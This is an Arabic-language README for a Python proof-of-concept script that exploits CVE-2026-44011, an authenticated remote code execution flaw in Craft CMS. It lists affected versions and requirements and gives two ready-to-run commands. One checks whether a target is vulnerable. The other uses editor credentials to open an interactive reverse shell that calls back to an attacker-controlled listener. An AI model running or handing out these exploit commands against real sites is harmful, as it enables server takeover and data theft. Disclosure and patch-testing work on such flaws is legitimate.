
PoC لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Craft CMS بعد المصادقة للثغرة CVE-2026-44011
يقوم هذا السكربت المكتوب بلغة Python بتكييف الهجوم الموصوف في التنبيه الأمني الخاص بـ Craft CMS. يمكن لمستخدم Craft موثّق الوصول إلى مسار تكوين تخطيط الحقول المصاب بثغرة، والتسبب في تنفيذ الخادم للأوامر.
الإصدارات المتأثرة هي Craft CMS >=4.0.0, <4.17.12 و >=5.0.0, <5.9.18.
يتطلب السكربت وجود curl على كلا المضيفين. ويستخدم Bash على الخادم. كما يوفّر Python3 على الخادم طرفية تفاعلية PTY؛ وبدونه، تعود الصدفة إلى اتصال أساسي.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
تنسب Craft CMS الفضل إلى @precicom-vincent-tl بصفته مكتشف CVE-2026-44011. وقد نُشرت تفاصيل الثغرة ومثال الحمولة في التنبيه الأمني الخاص بـ Craft CMS GHSA-qrgm-p9w5-rrfw. ويقوم هذا السكربت بتكييف تلك التقنية المنشورة.